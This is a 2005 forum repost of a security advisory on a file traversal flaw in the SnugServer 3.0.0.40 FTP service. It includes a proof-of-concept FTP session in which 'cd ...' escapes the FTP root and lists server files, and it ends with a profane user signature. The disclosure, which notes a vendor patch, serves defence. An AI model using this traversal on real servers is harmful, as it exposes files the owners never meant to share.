[转载]Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9861
精华: 771
积分: 40900
阅读权限: 200
性别: 男
在线时间: 3984 小时
注册时间: 2004-7-4
最后登录: 2008-11-18

发短消息
加为好友
当前离线

楼主大中小发表于 2005-1-28 18:39 只看该作者

[转载]Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40

文章作者：seclists.org

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks. Product
Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in
SnugServer 3.0.0.40 FTP Service, which allows access to the
server filesystem, outside of ftproot.

[-]PoC

root_at_Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
Welcome FTP User. SnugServer is ready.
Name (192.168.1.154:root): muts_at_default.com
331 Password required for muts_at_default.com.
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group 0 Jan 21 03:51 www
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>

[-] Patch

The vendor has been notified, and an update is available at:

http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››